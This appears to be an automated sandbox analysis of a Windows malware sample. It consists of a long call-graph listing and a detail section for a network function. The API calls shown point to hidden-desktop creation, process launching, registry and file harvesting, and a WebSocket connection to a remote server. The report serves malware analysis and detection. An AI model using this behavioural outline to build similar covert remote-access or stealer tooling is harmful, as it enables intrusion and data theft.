14212->14214 14215 407109 14212->14215 14226 4070b3 14212->14226 14213->14212 14218 4070b5 14214->14218 14219 4070ab 14214->14219 14220 402510 4 API calls 14215->14220 14272 40eca0 14218->14272 14223 402520 6 API calls 14219->14223 14224 407110 memcpy OpenDesktopA 14220->14224 14223->14226 14227 40716c 14224->14227 14228 40714c CreateDesktopA 14224->14228 14280 40f390 14226->14280 14230 407660 __stdio_common_vsnprintf_s 14227->14230 14228->14227 14232 40718b 14230->14232 14233 411fa0 3 API calls 14232->14233 14234 407207 14233->14234 14235 407221 strlen 14234->14235 14236 40722c 14234->14236 14235->14236 14237 402400 11 API calls 14236->14237 14245 40723a 14237->14245 14238 406fe0 247 API calls 14238->14245 14239 407303 CreateProcessA 14242 4074c2 14239->14242 14243 407352 Sleep 14239->14243 14240 4072bf ??3@YAXPAX 14268 4072c8 14240->14268 14241 411fa0 3 API calls 14241->14245 14246 4074e1 strlen 14242->14246 14247 4074ea 14242->14247 14243->14268 14244 40764d _invalid_parameter_noinfo_noreturn 14245->14238 14245->14241 14250 40727b 14245->14250 14246->14247 14248 402400 11 API calls 14247->14248 14249 4074f6 14248->14249 14251 406b00 221 API calls 14249->14251 14250->14240 14250->14244 14250->14268 14252 407504 14251->14252 14253 407511 strlen 14252->14253 14254 40751c 14252->14254 14253->14254 14255 406b00 221 API calls 14254->14255 14256 407525 14255->14256 14257 406b00 221 API calls 14256->14257 14270 407535 14257->14270 14258 406bc0 233 API calls 14258->14268 14259 40760c 14261 412050 4 API calls 14259->14261 14260 411fa0 CreateToolhelp32Snapshot Process32First Process32Next 14260->14268 14262 407614 CloseDesktop 14261->14262 14266 407608 14262->14266 14263 407414 strlen 14263->14268 14264 402400 11 API calls 14264->14268 14265 406fe0 247 API calls 14265->14268 14266->14058 14267 4072f0 ??3@YAXPAX 14267->14268 14268->14239 14268->14244 14268->14258 14268->14259 14268->14260 14268->14262 14268->14263 14268->14264 14268->14265 14268->14267 14269 4075ff ??3@YAXPAX 14269->14266 14270->14244 14270->14266 14270->14269 14271 4075fd 14270->14271 14271->14269 14273 40ecb0 14272->14273 14274 40ecfb 14272->14274 14273->14274 14275 40eccc 14273->14275 14276 40ecbe memcpy 14273->14276 14274->14226 14277 40ecf2 ??3@YAXPAX 14275->14277 14278 40ed0f _invalid_parameter_noinfo_noreturn 14275->14278 14279 40ecf0 14275->14279 14276->14275 14277->14274 14279->14277 14281 40f43b 14280->14281 14282 402500 4 API calls 14281->14282 14283 40f442 14282->14283 14285 404eae 14284->14285 14286 404f12 14285->14286 14289 404ed5 14285->14289 14287 402400 11 API calls 14286->14287 14288 404f31 14287->14288 14288->14068 14288->14071 14290 404fa7 14289->14290 14291 402400 11 API calls 14289->14291 14518 40ee20 14290->14518 14291->14290 14294 404fe8 14296 406b00 212 API calls 14294->14296 14295 404fd5 memcpy 14295->14294 14297 405022 14296->14297 14298 40503e memcpy 14297->14298 14303 405051 14297->14303 14298->14303 14299 4050c0 ??3@YAXPAX 14304 4050c9 14299->14304 14300 405122 ??3@YAXPAX 14302 40512b 14300->14302 14301 40533f _invalid_parameter_noinfo_noreturn 14305 405160 InternetReadFile 14302->14305 14306 405261 14302->14306 14303->14299 14303->14301 14303->14304 14304->14300 14304->14301 14304->14302 14307 4051e5 14305->14307 14309 40518d 14305->14309 14308 402400 11 API calls 14306->14308 14311 4053f0 3 API calls 14307->14311 14315 40528e 14308->14315 14309->14307 14310 4051ac strlen 14309->14310 14312 406b00 212 API calls 14309->14312 14310->14309 14313 405205 14311->14313 14312->14309 14316 405290 14313->14316 14317 4053f0 3 API calls 14313->14317 14314 405327 ??3@YAXPAX 14314->14288 14315->14288 14315->14301 14315->14314 14320 405325 14315->14320 14318 402400 11 API calls 14316->14318 14319 40521d 14317->14319 14326 40525f 14318->14326 14319->14316 14321 4053f0 3 API calls 14319->14321 14320->14314 14323 40523d 14321->14323 14322 4052ea ??3@YAXPAX 14322->14315 14323->14316 14324 405242 14323->14324 14325 40ed20 11 API calls 14324->14325 14325->14326 14326->14301 14326->14315 14326->14322 14328 405408 strlen 14327->14328 14330 405415 14327->14330 14328->14330 14329 405487 14333 40ed20 14329->14333 14330->14329 14331 405450 memchr 14330->14331 14332 405468 memcmp 14330->14332 14331->14329 14331->14330 14332->14329 14332->14330 14334 40ed3b 14333->14334 14335 40ee0d 14333->14335 14337 40ed68 14334->14337 14338 40ed48 14334->14338 14336 402500 4 API calls 14335->14336 14339 40ee14 14336->14339 14337->14335 14344 40ed72 14337->14344 14338->14339 14340 40ed51 14338->14340 14341 402510 4 API calls 14339->14341 14343 402520 6 API calls 14340->14343 14345 40ed63 14340->14345 14342 40ee1b 14341->14342 14343->14345 14347 406c36 memset lstrcatA 14344->14347 14348 40ed9e memmove 14344->14348 14346 40edd5 memcpy 14345->14346 14345->14347 14346->14347 14347->14078 14347->14079 14348->14347 14350 4054ae 14349->14350 14351 402400 11 API calls 14350->14351 14352 405504 14351->14352 14353 402400 11 API calls 14352->14353 14354 405535 14353->14354 14355 40ed20 11 API calls 14354->14355 14356 405566 14355->14356 14357 40558d memcmp 14356->14357 14368 4055a2 14356->14368 14357->14368 14358 4055fc ??3@YAXPAX 14364 405605 14358->14364 14359 405a36 14360 402400 11 API calls 14359->14360 14398 405a55 14360->14398 14361 40671b _invalid_parameter_noinfo_noreturn 14361->14398 14362 405668 14363 40ed20 11 API calls 14362->14363 14366 40573b 14363->14366 14364->14359 14364->14362 14365 405640 memchr 14364->14365 14369 40566d 14364->14369 14365->14362 14365->14364 14554 406940 14366->14554 14367 405a9f ??3@YAXPAX 14367->14398 14368->14358 14368->14361 14368->14364 14369->14362 14375 405678 14369->14375 14370 405b4e 14370->14095 14371 406aa0 160 API calls 14371->14398 14373 405af2 ??3@YAXPAX 14373->14398 14374 405b45 ??3@YAXPAX 14374->14370 14376 40ed20 11 API calls 14375->14376 14379 4056b2 14376->14379 14377 40675a send closesocket WSACleanup 14397 406756 14377->14397 14378 405838 14387 405984 WSAStartup 14378->14387 14381 406940 3 API calls 14379->14381 14380 4057d3 ??3@YAXPAX 14383 4057dc 14380->14383 14401 4056bf 14381->14401 14382 402400 11 API calls 14382->14397 14383->14378 14386 405810 memchr 14383->14386 14394 40583d 14383->14394 14384 405b43 14384->14374 14385 405390 ??3@YAXPAX _invalid_parameter_noinfo_noreturn 14385->14397 14386->14378 14386->14383 14387->14359 14391 4059a8 socket 14387->14391 14388 405712 14390 40ed20 11 API calls 14388->14390 14390->14366 14395 405a30 WSACleanup 14391->14395 14396 4059b9 getaddrinfo 14391->14396 14392 405709 ??3@YAXPAX 14392->14388 14394->14378 14400 40ed20 11 API calls 14394->14400 14395->14359 14403 405a26 closesocket 14396->14403 14404 405b5d htons freeaddrinfo connect 14396->14404 14397->14377 14397->14382 14397->14385 14397->14398 14570 40f450 14397->14570 14398->14361 14398->14367 14398->14370 14398->14371 14398->14373 14398->14374 14398->14377 14398->14384 14398->14397 14402 405390 ??3@YAXPAX _invalid_parameter_noinfo_noreturn 14398->14402 14418 40683c ??3@YAXPAX 14398->14418 14420 406893 ??3@YAXPAX 14398->14420 14405 405882 14400->14405 14401->14361 14401->14388 14401->14392 14402->14398 14403->14395 14406 405c44 closesocket WSACleanup 14404->14406 14407 405bba 14404->14407 14408 406940 3 API calls 14405->14408 14565 405350 14406->14565 14410 402400 11 API calls 14407->14410 14424 40588f 14408->14424 14412 405bed 14410->14412 14411 4058e2 14414 40ed20 11 API calls 14411->14414 14562 4069f0 14412->14562 14413 4058d9 ??3@YAXPAX 14413->14411 14417 40590b 14414->14417 14416 405c07 14419 406b00 160 API calls 14416->14419 14421 406940 3 API calls 14417->14421 14418->14398 14422 405c15 14419->14422 14420->14398 14430 405913 14421->14430 14423 405c62 14422->14423 14425 405c31 memcpy 14422->14425 14427 40f390 malloc strcpy_s free RaiseException 14423->14427 14424->14361 14424->14411 14424->14413 14425->14423 14426 40595d ??3@YAXPAX 14426->14378 14428 405c9f 14427->14428 14429 405cce 14428->14429 14431 405cbb memcpy 14428->14431 14432 406b00 160 API calls 14429->14432 14430->14361 14430->14378 14430->14426 14431->14429 14433 405d06 14432->14433 14434 405d35 14433->14434 14435 405d22 memcpy 14433->14435 14436 40f390 malloc strcpy_s free RaiseException 14434->14436 14435->14434 14437 405d72 14436->14437 14438 405da1 14437->14438 14439 405d8e memcpy 14437->14439 14440 406b00 160 API calls 14438->14440 14439->14438 14441 405dd9 14440->14441 14442 405e08 14441->14442 14443 405df5 memcpy 14441->14443 14444 40f390 malloc strcpy_s free RaiseException 14442->14444 14443->14442 14445 405e44 14444->14445 14446 405e79 14445->14446 14447 405e63 memcpy 14445->14447 14448 406b00 160 API calls 14446->14448 14447->14446 14449 405ebd 14448->14449 14450 405edc memcpy 14449->14450 14455 405ef2 14449->14455 14450->14455 14451 405f74 ??3@YAXPAX 14458 405f7d 14451->14458 14452 405fe2 ??3@YAXPAX 14460 405feb 14452->14460 14453 40604a ??3@YAXPAX 14463 406053 14453->14463 14454 4060ac ??3@YAXPAX 14464 4060b5 14454->14464 14455->14361 14455->14451 14455->14458 14456 40610e ??3@YAXPAX 14469 406117 14456->14469 14457 406170 ??3@YAXPAX 14470 406179 14457->14470 14458->14361 14458->14452 14458->14460 14459 4061e1 send 14465 4062e6 closesocket WSACleanup 14459->14465 14466 40621a recv 14459->14466 14460->14361 14460->14453 14460->14463 14461 4061d8 ??3@YAXPAX 14461->14459 14463->14361 14463->14454 14463->14464 14464->14361 14464->14456 14464->14469 14467 405350 12 API calls 14465->14467 14466->14465 14468 406238 14466->14468 14467->14398 14471 405350 12 API calls 14468->14471 14469->14361 14469->14457 14469->14470 14470->14361 14470->14459 14470->14461 14472 406246 rand rand rand rand 14471->14472 14473 406aa0 160 API calls 14472->14473 14474 406296 14473->14474 14475 406304 14474->14475 14476 4062a6 14474->14476 14478 406310 14475->14478 14479 4068a1 14475->14479 14477 406aa0 160 API calls 14476->14477 14480 4062b7 14477->14480 14481 406aa0 160 API calls 14478->14481 14482 406aa0 160 API calls 14479->14482 14483 406b00 160 API calls 14480->14483 14484 40631d 14481->14484 14494 4068ac 14482->14494 14501 4062ca 14483->14501 14485 406aa0 160 API calls 14484->14485 14487 40632d 14485->14487 14486 4062ce send 14496 4067c7 closesocket WSACleanup 14486->14496 14517 406402 14486->14517 14490 406aa0 160 API calls 14487->14490 14488 406925 14489 402510 malloc strcpy_s free RaiseException 14488->14489 14495 40692e 14489->14495 14492 406338 14490->14492 14497 406b00 160 API calls 14492->14497 14493 402520 6 API calls 14493->14494 14494->14480 14494->14488 14494->14493 14498 41eabe Concurrency::cancel_current_task RaiseException 14495->14498 14500 405350 12 API calls 14496->14500 14497->14501 14509 406933 14498->14509 14499 406459 recv 14499->14398 14499->14517 14500->14398 14501->14486 14501->14488 14502 402520 6 API calls 14501->14502 14502->14501 14503 40f4b0 memmove malloc strcpy_s free RaiseException 14503->14517 14504 4069b4 14504->14095 14505 40698a 14505->14504 14508 4069a7 memmove 14505->14508 14506 406981 ??3@YAXPAX 14506->14505 14507 4069e2 _invalid_parameter_noinfo_noreturn 14508->14504 14509->14504 14509->14505 14509->14506 14509->14507 14510 40697f 14509->14510 14510->14506 14511 4065f3 ??2@YAPAXI 14513 406600 memmove 14511->14513 14512 4065b9 ??2@YAPAXI 14512->14513 14513->14517 14514 40f6b0 13 API calls 14514->14517 14515 4066b6 memmove 14515->14517 14516 4064a2 ??3@YAXPAX 14516->14517 14517->14361 14517->14398 14517->14495 14517->14499 14517->14503 14517->14511 14517->14512 14517->14514 14517->14515 14517->14516 14519 40ee36 14518->14519 14522 40ee60 14518->14522 14521 40ee4e 14519->14521 14519->14522 14520 40ef23 14524 402500 4 API calls 14520->14524 14535 40ef30 14521->14535 14522->14520 14523 40ef1c 14522->14523 14528 404fb9 14522->14528 14529 40ee8b 14522->14529 14526 402510 4 API calls 14523->14526 14527 40ef2a 14524->14527 14526->14520 14528->14294 14528->14295 14530 40ee9b 14529->14530 14531 402520 6 API calls 14529->14531 14530->14528 14532 40eeb3 14530->14532 14533 40eebb memmove 14530->14533 14531->14530 14534 40eedd memcpy 14532->14534 14533->14534 14534->14528 14536 40f045 14535->14536 14542 40ef44 14535->14542 14538 402500 4 API calls 14536->14538 14537 40f04c 14540 402500 4 API calls 14537->14540 14538->14537 14539 40f03e 14541 402510 4 API calls 14539->14541 14543 40f053 14540->14543 14541->14536 14542->14537 14542->14539 14544 40ef80 14542->14544 14546 40f008 14542->14546 14545 402520 6 API calls 14544->14545 14548 40ef93 14544->14548 14545->14548 14546->14528 14547 40efc5 14550 40efe9 memmove 14547->14550 14551 40efc9 memcpy 14547->14551 14548->14546 14548->14547 14549 40efb2 memmove 14548->14549 14549->14547 14550->14546 14551->14546 14555 406950 14554->14555 14560 405789 14554->14560 14556 40698a 14555->14556 14557 406981 ??3@YAXPAX 14555->14557 14558 4069e2 _invalid_parameter_noinfo_noreturn 14555->14558 14561 40697f 14555->14561 14559 4069a7 memmove 14556->14559 14556->14560 14557->14556 14559->14560 14560->14361 14560->14380 14560->14383 14561->14557 14563 406a24 14562->14563 14564 406b00 221 API calls 14563->14564 14566 405379 14565->14566 14567 40536e strlen 14565->14567 14568 402400 11 API calls 14566->14568 14567->14566 14569 405384 14568->14569 14569->14398 14571 40f457 14570->14571 14572 40f49c 14570->14572 14573 40f47f ??3@YAXPAX 14571->14573 14574 40f49e _invalid_parameter_noinfo_noreturn 14571->14574 14572->14397 14573->14572 14576 40c7b2 14575->14576 14577 40c802 FindFirstFileA 14576->14577 14586 40cd96 14577->14586 14602 40c819 14577->14602 14578 402400 11 API calls 14578->14602 14579 40c88c strlen 14579->14602 14580 40c8b9 memcmp 14580->14602 14581 40c9fb ??3@YAXPAX 14581->14602 14582 40c848 FindNextFileA 14582->14586 14582->14602 14583 40cde9 _invalid_parameter_noinfo_noreturn 14590 40cdf0 14583->14590 14584 40c916 strlen 14584->14602 14585 40c942 memcmp 14585->14602 14586->14583 14587 40c9ad ??3@YAXPAX 14587->14602 14588 4113b0 lstrlenA 14588->14602 14589 40c790 27 API calls 14589->14602 14591 411520 GetFileAttributesA 14590->14591 14592 40cec6 14591->14592 14597 40cedf 14592->14597 14598 40cfa4 14592->14598 14599 40cf9f 14592->14599 14593 40cb57 CopyFileA 14596 40cb61 14593->14596 14593->14602 14594 40cc9e DeleteFileA 14594->14602 14595 411d20 3 API calls 14595->14596 14596->14595 14596->14602 14600 40c790 27 API calls 14597->14600 14601 409460 22 API calls 14598->14601 14600->14599 14601->14599 14602->14578 14602->14579 14602->14580 14602->14581 14602->14582 14602->14583 14602->14584 14602->14585 14602->14587 14602->14588 14602->14589 14602->14593 14602->14594 14623 40c530 14602->14623 14605 409481 14604->14605 14606 4094c3 FindFirstFileA 14605->14606 14607 409ec0 14606->14607 14608 4094d9 14606->14608 14609 4113b0 lstrlenA 14608->14609 14610 409574 14609->14610 14611 4095ce CopyFileA 14610->14611 14612 4095e9 14611->14612 14613 4076b0 3 API calls 14612->14613 14620 409600 14613->14620 14614 409765 strlen 14614->14620 14615 409799 memcmp 14615->14620 14616 402400 11 API calls 14616->14620 14617 40971b FindNextFileA 14617->14607 14617->14620 14618 4098db ??3@YAXPAX 14618->14620 14619 40988d ??3@YAXPAX 14619->14620 14620->14614 14620->14615 14620->14616 14620->14617 14620->14618 14620->14619 14621 409e26 14620->14621 14622 409460 15 API calls 14621->14622 14622->14607 14624 40c54c 14623->14624 14625 4076b0 3 API calls 14624->14625 14626 40c55d 14625->14626 14627 4115b0 LocalAlloc 14626->14627 14628 40c572 14626->14628 14627->14628 14734 40d080 lstrlenA 14629->14734 14631 40d2ac 14632 40d2d1 strcpy_s 14631->14632 14633 40d3dc 14631->14633 14634 40d2e2 HeapFree 14632->14634 14635 40d2f9 14632->14635 14636 40d758 14633->14636 14641 40d3ea HeapFree 14633->14641 14634->14635 14637 40d3f9 14635->14637 14640 40d080 276 API calls 14635->14640 14638 402400 11 API calls 14636->14638 14656 40d77f 14636->14656 14643 40d080 276 API calls 14637->14643 14638->14656 14644 40d318 HeapFree 14640->14644 14641->14636 14642 40d819 14642->13857 14647 40d40d HeapFree 14643->14647 14655 40d338 14644->14655 14645 40d7c3 ??3@YAXPAX 14650 40d7cc 14645->14650 14646 40d810 ??3@YAXPAX 14646->14642 14659 40d42f 14647->14659 14648 40d9a7 _invalid_parameter_noinfo_noreturn 14649 40d9ac 14648->14649 14652 402510 4 API calls 14649->14652 14650->14642 14650->14646 14650->14648 14658 40d80e 14650->14658 14654 40d9b5 memset memset memset memset RegOpenKeyExA 14652->14654 14660 40da5f RegGetValueA 14654->14660 14676 40da89 14654->14676 14655->14633 14661 40d349 strcpy_s 14655->14661 14656->14645 14656->14648 14656->14650 14658->14646 14664 40d440 strcpy_s 14659->14664 14695 40d73b 14659->14695 14672 40da8e 14660->14672 14660->14676 14662 40d371 14661->14662 14663 40d35a HeapFree 14661->14663 14665 40d080 276 API calls 14662->14665 14663->14662 14666 40d467 lstrlenA 14664->14666 14667 40d457 HeapFree 14664->14667 14670 40d381 HeapFree 14665->14670 14671 40d481 14666->14671 14667->14666 14668 40dadd RegOpenKeyExA 14668->14676 14717 40daf6 14668->14717 14677 40d3a5 14670->14677 14671->14636 14678 40d4c0 14671->14678 14679 40d4b5 strlen 14671->14679 14672->14668 14672->14676 14674 40d74f HeapFree 14674->14636 14676->13857 14677->14633 14681 40d3b2 strcpy_s 14677->14681 14680 402400 11 API calls 14678->14680 14679->14678 14682 40d4cd lstrlenA 14680->14682 14681->14637 14683 40d3c3 HeapFree 14681->14683 14684 40ed20 11 API calls 14682->14684 14683->14637 14686 40d4fe strcpy_s 14684->14686 14691 40d51d 14686->14691 14694 40d561 14686->14694 14688 40d5c3 HeapFree lstrlenA 14693 40d5ef 14688->14693 14689 40d558 ??3@YAXPAX 14689->14694 14690 40d5ba ??3@YAXPAX 14690->14688 14691->14648 14691->14689 14693->14695 14696 40d5fd strcpy_s 14693->14696 14694->14648 14694->14688 14694->14690 14695->14636 14695->14674 14697 40d610 HeapFree 14696->14697 14698 40d628 14697->14698 14720 40d670 14697->14720 14699 40d92f HeapFree 14698->14699 14701 40d825 14698->14701 14702 40d65b strlen 14698->14702 14699->14656 14706 40d953 14699->14706 14700 40d080 276 API calls 14700->14720 14707 402400 11 API calls 14701->14707 14702->14701 14703 40dc2a RegGetValueA 14703->14717 14705 40d697 HeapFree 14705->14720 14706->14656 14708 40d961 memcpy 14706->14708 14709 40d834 14707->14709 14708->14656 14710 406940 3 API calls 14709->14710 14721 40d83e 14710->14721 14711 40d88b 14714 40d8a2 14711->14714 14715 40d897 strlen 14711->14715 14712 40d882 ??3@YAXPAX 14712->14711 14713 40d6be strcpy_s 14713->14720 14716 406b00 221 API calls 14714->14716 14715->14714 14719 40d8af 14716->14719 14717->14676 14717->14703 14728 40dd12 RegGetValueA 14717->14728 14729 40d250 276 API calls 14717->14729 14730 40db42 ??3@YAXPAX 14717->14730 14731 40dddf _invalid_parameter_noinfo_noreturn 14717->14731 14732 40dde4 14717->14732 14718 40d6d5 HeapFree 14718->14720 14722 40ed20 11 API calls 14719->14722 14720->14649 14720->14695 14720->14698 14720->14700 14720->14705 14720->14713 14720->14718 14723 402520 6 API calls 14720->14723 14721->14648 14721->14711 14721->14712 14724 40d8da 14722->14724 14723->14720 14725 406940 3 API calls 14724->14725 14727 40d8e2 14725->14727 14726 40d926 ??3@YAXPAX 14726->14699 14727->14648 14727->14699 14727->14726 14728->14717 14729->14717 14730->14717 14731->14732 14733 413e50 93 API calls 14732->14733 14733->14676 14735 40d227 14734->14735 14736 40d0ad strchr 14734->14736 14735->14631 14736->14735 14737 40d0c6 strchr 14736->14737 14737->14735 14738 40d0de lstrlenA 14737->14738 14739 40d101 14738->14739 14739->14735 14740 40d13a 14739->14740 14741 40d12f strlen 14739->14741 14742 402400 11 API calls 14740->14742 14741->14740 14743 40d14c 14742->14743 14744 40ed20 11 API calls 14743->14744 14745 40d171 strcpy_s 14744->14745 14750 40d1d5 14745->14750 14752 40d199 14745->14752 14747 40d1cc ??3@YAXPAX 14747->14750 14748 40d21e ??3@YAXPAX 14748->14735 14749 40d244 _invalid_parameter_noinfo_noreturn 14751 40d250 14749->14751 14750->14735 14750->14748 14750->14749 14755 40d21c 14750->14755 14753 40d080 267 API calls 14751->14753 14752->14747 14752->14749 14754 40d2ac 14753->14754 14756 40d2d1 strcpy_s 14754->14756 14757 40d3dc 14754->14757 14755->14748 14758 40d2e2 HeapFree 14756->14758 14759 40d2f9 14756->14759 14760 40d758 14757->14760 14765 40d3ea HeapFree 14757->14765 14758->14759 14761 40d3f9 14759->14761 14764 40d080 267 API calls 14759->14764 14762 402400 11 API calls 14760->14762 14780 40d77f 14760->14780 14767 40d080 267 API calls 14761->14767 14762->14780 14768 40d318 HeapFree 14764->14768 14765->14760 14766 40d819 14766->14631 14771 40d40d HeapFree 14767->14771 14779 40d338 14768->14779 14769 40d7c3 ??3@YAXPAX 14774 40d7cc 14769->14774 14770 40d810 ??3@YAXPAX 14770->14766 14783 40d42f 14771->14783 14772 40d9a7 _invalid_parameter_noinfo_noreturn 14773 40d9ac 14772->14773 14776 402510 4 API calls 14773->14776 14774->14766 14774->14770 14774->14772 14782 40d80e 14774->14782 14778 40d9b5 memset memset memset memset RegOpenKeyExA 14776->14778 14784 40da5f RegGetValueA 14778->14784 14800 40da89 14778->14800 14779->14757 14785 40d349 strcpy_s 14779->14785 14780->14769 14780->14772 14780->14774 14782->14770 14788 40d440 strcpy_s 14783->14788 14819 40d73b 14783->14819 14796 40da8e 14784->14796 14784->14800 14786 40d371 14785->14786 14787 40d35a HeapFree 14785->14787 14789 40d080 267 API calls 14786->14789 14787->14786 14790 40d467 lstrlenA 14788->14790 14791 40d457 HeapFree 14788->14791 14794 40d381 HeapFree 14789->14794 14795 40d481 14790->14795 14791->14790 14792 40dadd RegOpenKeyExA 14792->14800 14851 40daf6 14792->14851 14801 40d3a5 14794->14801 14795->14760 14802 40d4c0 14795->14802 14803 40d4b5 strlen 14795->14803 14796->14792 14796->14800 14798 40d74f HeapFree 14798->14760 14800->14631 14801->14757 14805 40d3b2 strcpy_s 14801->14805 14804 402400 11 API calls 14802->14804 14803->14802 14806 40d4cd lstrlenA 14804->14806 14805->14761 14807 40d3c3 HeapFree 14805->14807 14808 40ed20 11 API calls 14806->14808 14807->14761 14810 40d4fe strcpy_s 14808->14810 14815 40d51d 14810->14815 14818 40d561 14810->14818 14812 40d5c3 HeapFree lstrlenA 14817 40d5ef 14812->14817 14813 40d558 ??3@YAXPAX 14813->14818 14814 40d5ba ??3@YAXPAX 14814->14812 14815->14772 14815->14813 14817->14819 14820 40d5fd strcpy_s 14817->14820 14818->14772 14818->14812 14818->14814 14819->14760 14819->14798 14821 40d610 HeapFree 14820->14821 14822 40d628 14821->14822 14843 40d670 14821->14843 14823 40d92f HeapFree 14822->14823 14825 40d825 14822->14825 14826 40d65b strlen 14822->14826 14823->14780 14830 40d953 14823->14830 14824 40d080 267 API calls 14824->14843 14831 402400 11 API calls 14825->14831 14826->14825 14827 40dc2a RegGetValueA 14827->14851 14829 40d697 HeapFree 14829->14843 14830->14780 14832 40d961 memcpy 14830->14832 14833 40d834 14831->14833 14832->14780 14834 406940 3 API calls 14833->14834 14844 40d83e 14834->14844 14835 40d88b 14838 40d8a2 14835->14838 14839 40d897 strlen 14835->14839 14836 40d882 ??3@YAXPAX 14836->14835 14837 40d6be strcpy_s 14837->14843 14840 406b00 221 API calls 14838->14840 14839->14838 14842 40d8af 14840->14842 14841 40d6d5 HeapFree 14841->14843 14845 40ed20 11 API calls 14842->14845 14843->14773 14843->14819 14843->14822 14843->14824 14843->14829 14843->14837 14843->14841 14846 402520 6 API calls 14843->14846 14844->14772 14844->14835 14844->14836 14847 40d8da 14845->14847 14846->14843 14848 406940 3 API calls 14847->14848 14850 40d8e2 14848->14850 14849 40d926 ??3@YAXPAX 14849->14823 14850->14772 14850->14823 14850->14849 14851->14800 14851->14827 14852 40dd12 RegGetValueA 14851->14852 14853 40d250 267 API calls 14851->14853 14854 40db42 ??3@YAXPAX 14851->14854 14855 40dddf _invalid_parameter_noinfo_noreturn 14851->14855 14856 40dde4 14851->14856 14852->14851 14853->14851 14854->14851 14855->14856 14857 413e50 93 API calls 14856->14857 14857->14800 14858 41d3c0 14859 41d3dc 14858->14859 14860 41d3ce 14858->14860 14861 41d3f0 5 API calls 14860->14861 14861->14859 14862 4125c0 14863 41266b 14862->14863 14866 4125db 14862->14866 14870 412400 14863->14870 14865 4127c4 14867 412681 14866->14867 14878 4120f0 14866->14878 14867->14865 14888 4044c0 14867->14888 14871 412417 14870->14871 14872 4113b0 lstrlenA 14871->14872 14873 41245d 14872->14873 14874 411270 memset 14873->14874 14875 41250f 14874->14875 14876 411270 memset 14875->14876 14877 412589 14876->14877 14877->14867 14879 41210b 14878->14879 14880 4113b0 lstrlenA 14879->14880 14885 412152 14880->14885 14882 41231c 14883 411270 memset 14882->14883 14884 41232c 14883->14884 14886 411270 memset 14884->14886 14902 404100 14885->14902 14887 4123a0 14886->14887 14889 4044e6 14888->14889 14890 402790 4 API calls 14889->14890 14891 4044f3 14890->14891 14892 4113b0 lstrlenA 14891->14892 14901 404c6d 14891->14901 14895 404584 14892->14895 14893 407790 lstrlenA 14894 404c50 14893->14894 14896 404ba7 memcpy 14895->14896 14895->14901 14897 404bc5 14896->14897 14898 404be7 memcpy 14897->14898 14899 404c00 14898->14899 14899->14894 14900 404c36 Sleep 14899->14900 14899->14901 14900->14894 14900->14899 14901->14893 14903 404123 14902->14903 14904 402790 4 API calls 14903->14904 14905 40412d 14904->14905 14905->14882 14929 41c450 14930 41c906 14929->14930 14933 41c47d 14929->14933 14931 41b0b0 memcpy 14930->14931 14932 41c92b 14931->14932 14933->14930 14934 41b0b0 memcpy 14933->14934 14935 41c020 memcpy 14933->14935 14934->14933 14935->14933 14936 41d950 14937 41d970 2 API calls 14936->14937 14938 41d963 14937->14938 14948 41eaa3 14949 41ea14 std::exception::exception 3 API calls 14948->14949 14950 41eab1 14949->14950 14942 41ea92 14943 41ec1f ___std_exception_destroy free 14942->14943 14944 41eaa1 14943->14944 14906 410107 14907 410100 14906->14907 14908 41010e 14906->14908 14914 405390 14907->14914 14910 410167 _invalid_parameter_noinfo_noreturn atexit 14908->14910 14911 410146 ??3@YAXPAX 14908->14911 14913 410144 14908->14913 14912 410163 14911->14912 14913->14911 14915 40539b 14914->14915 14916 4053cd 14914->14916 14917 4053c4 ??3@YAXPAX 14915->14917 14918 4053e0 _invalid_parameter_noinfo_noreturn 14915->14918 14919 4053c2 14915->14919 14916->14906 14917->14916 14919->14917 14951 41ecaa 14952 41ecc4 14951->14952 14953 41ecbc 14951->14953 14955 41ebae ??3@YAXPAX 14953->14955 14955->14952 14920 41ea4d 14925 41ec1f 14920->14925 14924 41ea71 14926 41ea62 14925->14926 14927 41ec2c free 14925->14927 14926->14924 14928 41ebae ??3@YAXPAX 14926->14928 14927->14926 14928->14924

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 004054A0 Relevance: 120.4, APIs: 62, Strings: 6, Instructions: 1411networkCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                            • Part of subcall function 00402400: memcpy.MSVCRT(00000000,?,?,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 004024B6
                                                                                                                                                                                                                                                                            • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,?,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,ws://,00000005,?,00000000,00000005), ref: 00405594
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000005), ref: 004055FD
                                                                                                                                                                                                                                                                          • memchr.MSVCRT ref: 00405644
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000005,-00000005), ref: 0040570A
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000005,000000FF,?,00000000,00000005), ref: 004057D4
                                                                                                                                                                                                                                                                          • memchr.MSVCRT ref: 00405814
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000001,000000FF), ref: 004058DA
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,?,00000001,000000FF), ref: 0040595E
                                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 00405993
                                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 004059AE
                                                                                                                                                                                                                                                                          • getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 00405A18
                                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 00405A2A
                                                                                                                                                                                                                                                                          • WSACleanup.WS2_32 ref: 00405A30
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AA0
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AF3
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000,?,00000000,00000005), ref: 00405B46
